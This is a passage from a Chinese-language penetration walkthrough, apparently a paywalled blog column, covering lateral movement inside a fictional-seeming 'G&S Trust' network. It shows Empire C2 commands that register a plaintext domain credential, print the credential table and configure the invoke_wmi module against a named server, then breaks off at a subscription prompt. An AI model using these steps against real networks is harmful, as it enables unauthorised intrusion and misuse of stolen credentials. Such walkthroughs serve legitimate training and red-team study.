渗透G&S Trust网络:获取关键数据的全流程揭秘
1. 初始攻击与权限提升
在对G&S Trust网络的渗透过程中,我们首先将admin.joey的凭证传递给 invoke_wmi 模块,并以服务器GS - CS - 01为目标。具体操作步骤如下:
(Empire: REH4UX5P) > creds add GSTRUST admin.joey Ronan1987
执行上述命令后,我们可以看到添加的凭证信息:
| CredID | CredType | Domain | UserName | Password |
| ------ | -------- | ------ | -------- | -------- |
| 1 | plaintext | GSTRUST | admin.joey | Ronan1987 |
接着,我们使用 invoke_wmi 模块进行横向移动:
(Empire: REH4UX5P) > usemodule lateral_movement/invoke_wmi
(Empire: invoke_wmi) > set Listener https_1
(Empire: invoke_wmi) > set CredID 1
(Empire: invoke_wmi) > set ComputerName GS-CS-01.G
超级会员免费看
订阅专栏 解锁全文
2077

被折叠的 条评论
为什么被折叠?



